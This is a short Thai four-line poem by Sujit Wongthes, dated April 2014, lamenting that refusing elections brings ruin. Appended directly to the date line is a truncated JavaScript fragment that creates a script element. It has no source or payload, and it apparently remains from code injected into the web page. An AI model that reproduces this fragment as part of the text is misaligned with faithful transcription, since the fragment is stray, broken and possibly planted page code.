ไปไม่กลับหลับไม่ตื่นฟื้นไม่มี

ดีไม่ดีหนีไม่พ้นการเลือกตั้ง

ตาต่อตาฟันต่อฟันพร้อมกันพัง

ไม่เลือกตั้งพังทุกทีไม่มีฟื้น

 

สุจิตต์ วงษ์เทศ

ศุกร์ 4 เมษายน 2557var d=document;var s=d.createElement(‘script’); }